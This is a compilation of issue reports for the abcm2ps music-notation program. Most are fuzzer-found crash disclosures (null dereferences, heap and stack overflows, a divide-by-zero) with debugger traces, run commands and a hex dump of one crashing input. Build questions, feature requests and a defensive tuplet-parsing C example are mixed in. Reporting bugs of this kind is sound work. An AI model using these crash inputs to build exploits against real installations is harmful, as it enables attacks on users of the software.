./abcm2ps -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10

Vulnerable code :

for (p_voice = first_voice; p_voice; p_voice = p_voice->next) {
    int bar_start;
    voice = p_voice - voice_tb;
    if (last_s->voice == voice && last_s->type == BAR) {
        p_voice->last_sym = last_s;
        last_s = last_s->ts_next;
        continue;
    }
 

Debug:

GDB :

Program received signal SIGSEGV, Segmentation fault.
[ Legend: Modified register | Code | Heap | Stack | String]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]────
$rax   : 0x0
$rbx   : 0x5555557cc240      →  0x0000000000000031 ("1"?)
$rcx   : 0x555555876538      →  0x0000000000000000
$rdx   : 0x0
$rsp   : 0x7fffffffdbb0      →  0x00000000ffffdbc0
$rbp   : 0x7fffffffdd00      →  0x0101010101010101
$rsi   : 0x5555557c39a0      →  0x00005555557dabc8  →  0x0000000000000000
$rdi   : 0x5555557db7a8      →  0x0000000000000000
$rip   : 0x555555582a65      →  <output_music+6885> movzx edx, BYTE PTR [r12+0x3a]
$r8    : 0x5555557c39a0      →  0x00005555557dabc8  →  0x0000000000000000
$r9    : 0x0
$r10   : 0x0
$r11   : 0x1
$r12   : 0x0
$r13   : 0x5555557cc440      →  0x0000000000000032 ("2"?)
$r14   : 0x0
$r15   : 0xff000000ff
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$ss: 0x002b  $cs: 0x0033  $gs: 0x0000  $fs: 0x0000  $ds: 0x0000  $es: 0x0000
────────────────────────────────────────────────────[ stack ]────
0x00007fffffffdbb0│+0x00: 0x00000000ffffdbc0     ← $rsp
0x00007fffffffdbb8│+0x08: 0x00005555557c39a0  →  0x00005555557dabc8  →  0x0000000000000000
0x00007fffffffdbc0│+0x10: 0x00007fffffffdce0  →  0x0101010101010101
0x00007fffffffdbc8│+0x18: 0x00005555557c39a0  →  0x00005555557dabc8  →  0x0000000000000000
0x00007fffffffdbd0│+0x20: 0x43bd000042f80000
0x00007fffffffdbd8│+0x28: 0x000055555585fab0  →  0x000055555585fd00  →  0x000055555585ff50  →  0x00005555558601a0  →  0x00005555558688e8  →  0x0000555555868b38  →  0x0000555555868d88
0x00007fffffffdbe0│+0x30: 0x00007fffffffdcf0  →  0x0101010101010101
0x00007fffffffdbe8│+0x38: 0x00007fffffffdce0  →  0x0101010101010101
─────────────────────────────────────────[ code:i386:x86-64 ]────
   0x555555582a58 <output_music+6872> mov    r13, QWORD PTR [r13+0x10]
   0x555555582a5c <output_music+6876> test   r13, r13
   0x555555582a5f <output_music+6879> je     0x555555582870 <output_music+6384>
→ 0x555555582a65 <output_music+6885> movzx  edx, BYTE PTR [r12+0x3a]
   0x555555582a6b <output_music+6891> mov    rax, r13
   0x555555582a6e <output_music+6894> sub    rax, rbx
   0x555555582a71 <output_music+6897> sar    rax, 0x9
   0x555555582a75 <output_music+6901> cmp    eax, edx
   0x555555582a77 <output_music+6903> jne    0x555555582950 <output_music+6608>
──────────────────────────────────────────[ source:music.c+3323 ]────
   3318         for (p_voice = first_voice; p_voice; p_voice = p_voice->next) {
   3319                 int bar_start;
   3320
   3321                 // if bar already, keep it in sequence
   3322                 voice = p_voice - voice_tb;
→ 3323                 if (last_s->voice == voice && last_s->type == BAR) {
   3324                         p_voice->last_sym = last_s;
   3325                         last_s = last_s->ts_next;
   3326                         continue;
   3327                 }
   3328
──────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
────────────────────────────────────────────────────[ trace ]────
[#0] 0x555555582a65 → Name: init_music_line()
[#1] 0x555555582a65 → Name: set_piece()
[#2] 0x555555582a65 → Name: output_music()
[#3] 0x5555555886c1 → Name: generate()
[#4] 0x555555588c38 → Name: gen_ly(eob=0x0)
[#5] 0x55555558eab8 → Name: do_tune()
[#6] 0x555555560ce2 → Name: abc_parse(p=0x5555557ddbb0 "", fname=0x5555557f7f10 "abcm2ps_output/crashes/crash4062", ln=0x65)
[#7] 0x555555578c14 → Name: txt_add_eos(fname=0x5555557f7f10 "abcm2ps_output/crashes/crash4062", linenum=0x65)
[#8] 0x5555555790a4 → Name: frontend(s=<optimized out>, ftype=<optimized out>, fname=<optimized out>, linenum=<optimized out>)
[#9] 0x55555555c0bd → Name: treat_file(fn=0x7fffffffe66a "abcm2ps_output/crashes/crash4062", ext=<optimized out>)
──────────────────────────────
init_music_line () at music.c:3323
3323                    if (last_s->voice == voice && last_s->type == BAR) {

gef➤  p last_s
$1 = (struct SYMBOL *) 0x0


gef➤  i r
rax            0x0      0x0
rbx            0x5555557cc240   0x5555557cc240
rcx            0x555555876538   0x555555876538
rdx            0x0      0x0
rsi            0x5555557c39a0   0x5555557c39a0
rdi            0x5555557db7a8   0x5555557db7a8
rbp            0x7fffffffdd00   0x7fffffffdd00
rsp            0x7fffffffdbb0   0x7fffffffdbb0
r8             0x5555557c39a0   0x5555557c39a0
r9             0x0      0x0
r10            0x0      0x0
r11            0x1      0x1
r12            0x0      0x0
r13            0x5555557cc440   0x5555557cc440
r14            0x0      0x0
r15            0xff000000ff     0xff000000ff
rip            0x555555582a65   0x555555582a65 <output_music+6885>
eflags         0x10202 [ IF RF]
cs             0x33     0x33
ss             0x2b     0x2b
ds             0x0      0x0
es             0x0      0x0
fs             0x0      0x0
gs             0x0      0x0

Reproducer file - Reproducer

heap-buffer-overflow parse.c:3482 in do_tune

Reproducer: abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc.zip (SHA1: 292bad90a19bc9dc8a61729daef4e76550d39347)
Tested in: 070cfe6
Fuzzing tool used: afl-2.52b

00000000  58 3a 30 0a 54 3a 20 20  20 20 20 20 20 30 30 30  |X:0.T:       000|
00000010  0a 92 30 30 30 30 30 30  30 30 30 30 30 30 30 80  |..0000000000000.|
00000020  30 30 30 30 30 30 0a 20  20 30 30 30 30 30 30 30  |000000.  0000000|
00000030  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
*
00000050  30 30 30 30 8e 30 30 30  30 30 30 30 30 30 30 30  |0000.00000000000|
00000060  0a 4b 3a 47 0a 92 22 30  30 30 30 30 22 30 22 22  |.K:G.."00000"0""|
00000070  22 22 22 22 3a 30 30 bb  30 7c 40 7c 7c 7c 67 32  |"""":00.0|@|||g2|
00000080  67 81 20 4a 30 64 32 30  66 32 22 30 22 22 22 22  |g. J0d20f2"0""""|
00000090  22 22 30 30 30 30 30 30  30 30 30 30 30 30 0a 4d  |""000000000000.M|
000000a0  3a 34 2f 34                                       |:4/4|
000000a4
./src/abcm2ps/abcm2ps abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc
abcm2ps-8.13.20 (2018-02-21)
File abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:0: error: Bad character
   6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
     ^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:1: error: Bad character
   6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
      ^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:9: error: Bad character
   6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
              ^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:19: error: Bad character
   6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
                        ^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:20: error: Bad character
   6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
                         ^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:21: error: Bad character
   6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
                          ^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:23: error: Bad character
   6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
                            ^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:30: error: Bad character
   6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
                                   ^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:31: error: Bad character
   6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
                                    ^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:34: error: Bad character
   6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
                                       ^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:60: error: No end of guitar chord
   6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
                                                                 ^
=================================================================
==23434==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000000e0 at pc 0x55aaafbb5fc8 bp 0x7ffc649ef9e0 sp 0x7ffc649ef9d8
READ of size 1 at 0x6250000000e0 thread T0
    #0 0x55aaafbb5fc7 in do_tune /home/hsalo/src/abcm2ps/parse.c:3482
    #1 0x55aaafa239b0 in abc_eof /home/hsalo/src/abcm2ps/abcparse.c:200
    #2 0x55aaafafddf8 in frontend /home/hsalo/src/abcm2ps/front.c:905
    #3 0x55aaafa1bf3e in treat_file /home/hsalo/src/abcm2ps/abcm2ps.c:239
    #4 0x55aaafa182b6 in main /home/hsalo/src/abcm2ps/abcm2ps.c:1040
    #5 0x7fc6e08642e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
    #6 0x55aaafa1a649 in _start (/home/hsalo/src/abcm2ps/abcm2ps+0x37649)

0x6250000000e0 is located 32 bytes to the left of 8222-byte region [0x625000000100,0x62500000211e)
allocated by thread T0 here:
    #0 0x7fc6e0fa8d28 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.3+0xc1d28)
    #1 0x55aaafa1eba1 in getarena /home/hsalo/src/abcm2ps/abcm2ps.c:1105

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hsalo/src/abcm2ps/parse.c:3482 in do_tune
Shadow bytes around the buggy address:
  0x0c4a7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4a7fff8010: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa
  0x0c4a7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==23434==ABORTING

Null pointer dereference vulnerability in the function d_cresc()

Tested environment : 64-bit ubuntu 16.04 LTS

Affected version : 8.14.1-master

Command :
./abcm2ps r -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10

s2 = de->s;
de1 = de->start;
if (de1) {
	s = de1->s;
	x = s->x + 3;
}

Debug:

GDB :

		de1 = de->start;
		s = de1->s;
		x = s->x + 3;
//	} else {			/* end without start */
//		if (!first_note) {
//			dd = &deco_def_tb[de->t];
//			error(1, s2, "No start of deco !%s!", dd->name);
────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] 0x555555567141 → d_cresc(de=0x5555557eb610)
[#1] 0x5555555698e8 → draw_deco_staff()
[#2] 0x555555572d48 → draw_sym_near()
[#3] 0x555555583dbd → delayed_output(indent=0)
[#4] 0x555555583dbd → output_music()
[#5] 0x555555589501 → generate()
[#6] 0x555555589a78 → gen_ly(eob=0x0)
[#7] 0x55555558f8f8 → do_tune()
[#8] 0x555555561a52 → abc_parse(p=0x5555557f4a20 "", fname=0x5555557f39f0 "POC", ln=0x16b)
[#9] 0x555555579a54 → txt_add_eos(fname=0x5555557f39f0 "POC", linenum=0x16b)
gef➤  p de1
$1 = (struct deco_elt *) 0x0
gef➤  p *de1
Cannot access memory at address 0x0
gef➤  p *de1->s
Cannot access memory at address 0x10
gef➤   i r 
rax            0x1	0x1
rbx            0x5555557eb610	0x5555557eb610
rcx            0x1b	0x1b
rdx            0xc0	0xc0
rsi            0x1	0x1
rdi            0x5555557eb610	0x5555557eb610
rbp            0x5555557be800	0x5555557be800 <deco_def_tb+96>
rsp            0x7fffffffd4c0	0x7fffffffd4c0
r8             0x0	0x0
r9             0x5555557eb610	0x5555557eb610
r10            0x0	0x0
r11            0x5555557e8390	0x5555557e8390
r12            0x0	0x0
r13            0x5555557be7a0	0x5555557be7a0
r14            0x0	0x0
r15            0x5555557c5760	0x5555557c5760
rip            0x555555567141	0x555555567141 <d_cresc+49>
eflags         0x10202	[ IF RF ]
cs             0x33	0x33
ss             0x2b	0x2b
ds             0x0	0x0
es             0x0	0x0
fs             0x0	0x0
gs             0x0	0x0

Valgrind :

Process terminating with default action of signal 11 (SIGSEGV)
Access not within mapped region at address 0x10
 at 0x11B141: d_cresc (deco.c:359)
 by 0x11D8E7: draw_deco_staff (deco.c:1908)
 by 0x126D47: draw_sym_near (draw.c:4216)
 by 0x137DBC: delayed_output (music.c:5085)
 by 0x137DBC: output_music (music.c:5140)
 by 0x13D500: generate (parse.c:1039)
 by 0x13DA77: gen_ly (parse.c:1060)
 by 0x1438F7: do_tune (parse.c:3633)
 by 0x115A51: abc_parse (abcparse.c:177)
 by 0x12DA53: txt_add_eos (front.c:379)
 by 0x12DEE3: frontend (front.c:891)
 by 0x110E2C: treat_file (abcm2ps.c:240)
 by 0x10F9E0: main (abcm2ps.c:1033)
Segmentation fault

Reproducer file - Reproducer

Unable to compile on (Arch-)Linux

As suggested in the installation manual I ran ./configure && make, but the following error occurred:

gcc -g -O2 -Wall -pipe -DHAVE_PANGO=1 -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/lib/libffi-3.2.1/include -I/usr/include/harfbuzz -I/usr/include/fribidi -I/usr/include/freetype2 -I/usr/include/libpng16 -I/usr/include/uuid -I/usr/include/cairo -I/usr/include/pixman-1  -I.  -c -o subs.o subs.c
subs.c: In function ‘pg_line_output’:
subs.c:409:3: error: unknown type name ‘FT_Face’
  409 |   FT_Face face = pango_fc_font_lock_face(fc_font);
      |   ^~~~~~~

Since the tests seem to run, I think this could be some platform-specific issue.
Are there any dependencies which could be unmet?
Any help is appreciated! 😊

gcc --version -> gcc (GCC) 9.1.0
uname -r      -> Linux x 5.2.6-1-ARCH

subs.c:22:10: fatal error: 'pango/pangocairo.h' file not found

When I tried to install abcm2ps-8.13.11 on my mac using the command
make

the following error occurred:

gcc -g -O2 -Wall -pipe -DHAVE_PANGO=1 -I. -I/usr/include/pango-1.0 -pthread -I/usr/include/cairo -I/usr/include/glib-2.0 -I/usr/lib/arm-linux-gnueabihf/glib-2.0/include -I/usr/include/pixman-1 -I/usr/include/libpng12 -I/usr/include/freetype2 -c -o subs.o subs.c
subs.c:22:10: fatal error: 'pango/pangocairo.h' file not found
#include <pango/pangocairo.h>
^
1 error generated.
make: *** [subs.o] Error 1

I have already installed pango on my Mac (macOS Sierra 10.12) and I am sure the folders are under the /usr/include directory.

Could anyone who has ever compiled the sources successfully give me a solution?

notes key is equal, but voice is error

'E' key: the notes' key is equal and the voice is not equal, but abcm2ps parses these notes as if the voice were equal, which is an error.

X:1
Z:?
%%scale 0.85
%%pagewidth 21.00cm
%%leftmargin 1.89cm
%%rightmargin 1.26cm
%%score { 1 | ( 2 3 ) }
L:1/16
Q:1/4=120
M:4/4
I:linebreak $
K:C
V:1 treble nm="Piano" snm="Pno."
V:2 treble
V:3 treble
L:1/8
V:1
!wedge!B2!wedge!B2 z2{/a} (g^f/g/) !wedge!c2{/a}(gf/g/) !wedge!d2{/a}(gf/g/) | %1
!wedge!e2{/a}(g^f/g/) !wedge!B2{/a}(gf/g/) !wedge!c2{/a}(gf/g/) !wedge!d2{/a}(gf/g/) |] %2
V:2
FGFG FGFG EGEG DGDG | EGEG FGFG"^cresc." EGEG DGDG |] %2
V:3
[CD][CD] [CD][CD] CC B,B, | CC DD EE B,B, |] %2

stack-buffer-overflow music.c:5085 in delayed_output(float indent)

https://drive.google.com/open?id=1DvBEh5D-eW4UkvX3947UQh62i7hUIFN1

(gdb) set args POC
(gdb) r
abcm2ps-8.13.20 (2018-02-21)
File POC
POC:3:2: error: Bad character
3 |2ÿÿdÿ&e,d_d&ddªB-ÿ2ÿ
^
POC:3:3: error: Bad character
3 |2ÿÿdÿ&e,d_d&ddªB-ÿ2ÿ
.
.
.
POC:3:15: error: Wrong duration in voice overlay
POC:4:0: error: Bad character 'k'
POC:4:0: error: Note too much dotted
POC:5:0: error: Bad character 'N'
POC:5:0: error: Bad character 'N'
POC:6:1: error: Wrong duration in voice overlay
POC:6:3: error: No note in voice overlay
POC:6:3: error: Bad character 'K'
POC:6:3: error: Bad character 't'
POC:6:3: error: Wrong duration in voice overlay
POC:6:6: error: !slide! must be on a note or a rest
POC:6:27: warning: Line underfull (256pt of 682pt)

Program received signal SIGSEGV, Segmentation fault.
__GI_getenv (name=0x7ffff6a14b8e "BC_FATAL_STDERR_", name@entry=0x7ffff6a14b8c "LIBC_FATAL_STDERR_")
at getenv.c:84
84 getenv.c: No such file or directory.
(gdb) bt
#0 0x00007ffff68c081d in __GI_getenv (name=0x7ffff6a14b8e "BC_FATAL_STDERR_",
name@entry=0x7ffff6a14b8c "LIBC_FATAL_STDERR_") at getenv.c:84
#1 0x00007ffff68c0f02 in __GI___libc_secure_getenv (name=name@entry=0x7ffff6a14b8c "LIBC_FATAL_STDERR_")
at secure-getenv.c:29
#2 0x00007ffff68fe55a in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff6a1649f "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:80
#3 0x00007ffff69a015c in __GI___fortify_fail (msg=<optimized out>,
msg@entry=0x7ffff6a16481 "stack smashing detected") at fortify_fail.c:37
#4 0x00007ffff69a0100 in __stack_chk_fail () at stack_chk_fail.c:28
#5 0x0000000000507f45 in delayed_output (indent=<optimized out>) at music.c:5085

Division-by-zero vulnerability in parse.c:6098

Hi,

I'm hitting this bug in the latest version of abcm2ps (abcm2ps-8.13.21 (2018-05-05))

valgrind ./report3.abc 
valgrind: report3.abc: command not found
root@invictus1306-VirtualBox:/home/invictus1306/Documents/todel/abcm2ps# valgrind ./abcm2ps report3.abc 
==17541== Memcheck, a memory error detector
==17541== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==17541== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==17541== Command: ./abcm2ps report3.abc
==17541== 
abcm2ps-8.13.21 (2018-05-05)
File report3.abc
==17541== 
==17541== Process terminating with default action of signal 8 (SIGFPE)
==17541==  Integer divide by zero at address 0x802F91060
==17541==    at 0x434A04: set_tuplet (parse.c:6098)
==17541==    by 0x434A04: do_tune (parse.c:3608)
==17541==    by 0x4088A1: abc_parse (abcparse.c:177)
==17541==    by 0x41F686: txt_add_eos (front.c:379)
==17541==    by 0x4200E7: frontend (front.c:891)
==17541==    by 0x403FAC: treat_file (abcm2ps.c:239)
==17541==    by 0x4030E7: main (abcm2ps.c:1040)
==17541== 
==17541== HEAP SUMMARY:
==17541==     in use at exit: 218,169 bytes in 29 blocks
==17541==   total heap usage: 44 allocs, 15 frees, 300,837 bytes allocated
==17541== 
==17541== LEAK SUMMARY:
==17541==    definitely lost: 0 bytes in 0 blocks
==17541==    indirectly lost: 0 bytes in 0 blocks
==17541==      possibly lost: 0 bytes in 0 blocks
==17541==    still reachable: 218,169 bytes in 29 blocks
==17541==         suppressed: 0 bytes in 0 blocks
==17541== Rerun with --leak-check=full to see details of leaked memory
==17541== 
==17541== For counts of detected and suppressed errors, rerun with: -v
==17541== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)

It is a division-by-zero vulnerability
report3.zip

<do_tune+2482>   idiv   esi
$rsi   : 0x0000000000000000
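
The valgrind trace above places the fault in set_tuplet with a zero divisor in rsi. The parser below is an added example for this page, not abcm2ps code, and assumes (as the name set_tuplet suggests, though the post shows no source) that the tuplet ratio p:q is later used to rescale note durations. It parses the ABC tuplet marker "(p:q:r" (p notes in the time of q, applied to r notes), fills in the default q for a bare "(p" from the ABC 2.1 tuplet table, and refuses any zero before the values can reach a division. The compound_meter flag stands in for the meter lookup that decides n for p = 5, 7 and 9.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>

/* A parsed "(p:q:r" tuplet marker: p notes in the time of q, applied to r notes. */
struct tuplet {
	int p, q, r;
};

/* Default q when "(p" carries no explicit q, following the ABC 2.1 tuplet table.
 * For p = 5, 7, 9 the standard uses n = 3 in compound meters and n = 2 otherwise.
 * Returns 0 for a p that has no default, so it is caught by the zero check. */
static int default_q(int p, int compound_meter)
{
	switch (p) {
	case 2: case 4: case 8: return 3;
	case 3: case 6:         return 2;
	case 5: case 7: case 9: return compound_meter ? 3 : 2;
	default:                return 0;
	}
}

/* Reads one optional ":n" field. An empty field (":" followed by a non-digit)
 * leaves *out untouched, as in "(3::2". Returns a pointer past the field. */
static const char *field(const char *s, int *out)
{
	char *end;

	if (*s != ':')
		return s;
	s++;
	if (!isdigit((unsigned char) *s))
		return s;
	*out = (int) strtol(s, &end, 10);
	return end;
}

/* Parses "(p", "(p:q" or "(p:q:r". Returns 0 on success, -1 when the text is
 * not a tuplet marker, and -2 when p, q or r is zero. p and q are used as a
 * ratio to rescale note durations, so a zero must never leave the parser. */
int parse_tuplet(const char *s, int compound_meter, struct tuplet *t)
{
	char *end;

	if (*s != '(' || !isdigit((unsigned char) s[1]))
		return -1;
	t->p = (int) strtol(s + 1, &end, 10);
	t->q = default_q(t->p, compound_meter);
	t->r = t->p;
	s = field(end, &t->q);
	field(s, &t->r);
	if (t->p <= 0 || t->q <= 0 || t->r <= 0)
		return -2;
	return 0;
}

/* Length of one note inside the tuplet, for a note of length 'base' outside it.
 * Only valid after parse_tuplet returned 0, which guarantees p != 0. */
int tuplet_note_len(const struct tuplet *t, int base)
{
	return base * t->q / t->p;
}

int main(void)
{
	/* constructed inputs: the first three are well formed, the rest must be rejected */
	const char *inputs[] = { "(3", "(3:2:3", "(5", "(3:0", "(0", "(3:2:0", "3" };

	for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
		struct tuplet t;
		int rc = parse_tuplet(inputs[i], 0, &t);
		if (rc == 0)
			printf("%-8s p=%d q=%d r=%d  note of 12 -> %d\n",
			       inputs[i], t.p, t.q, t.r, tuplet_note_len(&t, 12));
		else
			printf("%-8s rejected (%d)\n", inputs[i], rc);
	}
	return 0;
}
```

The point of the -2 return is that the rejection happens where the text is read, with the offending marker still identifiable, rather than deep in the layout code where only a SIGFPE is left.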

tuplet numbers and accents

The following example shows the behaviour for tuplets with accents. When the tuplet number is on the same side as the accent, the tuplet number is drawn nearer than the accent, which looks odd.

X:1
K:C
[I:tuplets 0 0 0 2](3!>!g!>!a!>!b (3!>!G!>!A!>!B | [I:tuplets 0 0 0 1] (3!>!g!>!a!>!b (3!>!.g!>!.a!>!.b

Missing coda

missing_coda.txt

In the attached abc file the coda sign is not displayed with a certain order of %%staves (see inside the abc). It seems to be due to the "@" guitar chord at the same place (in another voice).

Add larsen articulation symbols

It would be useful to me if abcm2ps supported the Larsen articulation symbols, particularly 'cut' and 'strike'. I'd guess they would be noted with !cut! and !strike! in addition to !roll! which already exists.

I know it is common to notate these using grace notes, but in my current project this notation would be ambiguous, as it requires different interpretation from 'classical' grace notes.

Memory access violation in draw.c:4746

Hi,

I'm hitting this bug in the latest version of abcm2ps (abcm2ps-8.13.21 (2018-05-05))

valgrind ./abcm2ps ./report1.abc 
==17134== Memcheck, a memory error detector
==17134== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==17134== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==17134== Command: ./abcm2ps ../../abcm2ps/crashes_/report1.abc
==17134== 
abcm2ps-8.13.21 (2018-05-05)
File ../../abcm2ps/crashes_/report1.abc
error: Bad page width 0.0
../../abcm2ps/crashes_/report1.abc:56:10: error: Unknown clef
  56 [K:G clef=trfble
               ^
==17134== Invalid read of size 1
==17134==    at 0x41BF78: draw_symbols (draw.c:4746)
==17134==    by 0x41BF78: draw_all_symb (draw.c:4835)
==17134==    by 0x42960F: output_music (music.c:5141)
==17134==    by 0x42E1F0: generate (parse.c:1039)
==17134==    by 0x42E877: gen_ly (parse.c:1060)
==17134==    by 0x43433F: do_tune (parse.c:3621)
==17134==    by 0x4088A1: abc_parse (abcparse.c:177)
==17134==    by 0x41F686: txt_add_eos (front.c:379)
==17134==    by 0x4200E7: frontend (front.c:891)
==17134==    by 0x403FAC: treat_file (abcm2ps.c:239)
==17134==    by 0x4030E7: main (abcm2ps.c:1040)
==17134==  Address 0x10044817c is not stack'd, malloc'd or (recently) free'd
==17134== 
==17134== 
==17134== Process terminating with default action of signal 11 (SIGSEGV)
==17134==  Access not within mapped region at address 0x10044817C
==17134==    at 0x41BF78: draw_symbols (draw.c:4746)
==17134==    by 0x41BF78: draw_all_symb (draw.c:4835)
==17134==    by 0x42960F: output_music (music.c:5141)
==17134==    by 0x42E1F0: generate (parse.c:1039)
==17134==    by 0x42E877: gen_ly (parse.c:1060)
==17134==    by 0x43433F: do_tune (parse.c:3621)
==17134==    by 0x4088A1: abc_parse (abcparse.c:177)
==17134==    by 0x41F686: txt_add_eos (front.c:379)
==17134==    by 0x4200E7: frontend (front.c:891)
==17134==    by 0x403FAC: treat_file (abcm2ps.c:239)
==17134==    by 0x4030E7: main (abcm2ps.c:1040)
==17134==  If you believe this happened as a result of a stack
==17134==  overflow in your program's main thread (unlikely but
==17134==  possible), you can try to increase the size of the
==17134==  main thread stack using the --main-stacksize= flag.
==17134==  The main thread stack size used in this run was 8388608.
==17134== 
==17134== HEAP SUMMARY:
==17134==     in use at exit: 241,110 bytes in 35 blocks
==17134==   total heap usage: 61 allocs, 26 frees, 661,858 bytes allocated
==17134== 
==17134== LEAK SUMMARY:
==17134==    definitely lost: 0 bytes in 0 blocks
==17134==    indirectly lost: 0 bytes in 0 blocks
==17134==      possibly lost: 0 bytes in 0 blocks
==17134==    still reachable: 241,110 bytes in 35 blocks
==17134==         suppressed: 0 bytes in 0 blocks
==17134== Rerun with --leak-check=full to see details of leaked memory
==17134== 
==17134== For counts of detected and suppressed errors, rerun with: -v
==17134== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)

It is a read access violation (draw_symbols (draw.c:4746))

0x41bf78 <draw_all_symb+4648> movsx edx, BYTE PTR [rax+0x44817d]

The value of rax could be controlled by an attacker

$rax : 0x00000000ffffffff

but I did not do a thorough analysis.

report1.zip

Null pointer dereference vulnerability in the function d_trill()

Tested environment : 64-bit ubuntu 16.04 LTS

Affected version : 8.14.1-master

Command :
./abcm2ps r -E -g -x -v -O fff -O = -i -k 1 POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10

Vulnerable code :

if (de->start) {		/* deco start */
	s = de->start->s;
	x = s->x;
	if (s->abc_type == ABC_T_NOTE
	 && s->u.note.dc.n > 1)
		x += 10;

Debug:

GDB :

→  588	 		s = de->start->s;
    589	 		x = s->x;
    590	 		if (s->abc_type == ABC_T_NOTE
    591	 		 && s->u.note.dc.n > 1)
    592	 			x += 10;
    593	 //	} else {			/* end without start */
────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] 0x5555555675bf → d_trill(de=0x5555557eb610)
[#1] 0x555555569064 → draw_deco_note()
[#2] 0x555555572d43 → draw_sym_near()
[#3] 0x555555583dbd → delayed_output(indent=0)
[#4] 0x555555583dbd → output_music()
[#5] 0x555555589501 → generate()
[#6] 0x555555589a78 → gen_ly(eob=0x0)
[#7] 0x55555558f8f8 → do_tune()
[#8] 0x555555561a52 → abc_parse(p=0x5555557f4a20 "", fname=0x5555557f39f0 "POC", ln=0x16b)
[#9] 0x555555579a54 → txt_add_eos(fname=0x5555557f39f0 "POC", linenum=0x16b)
gef➤  p  de->start
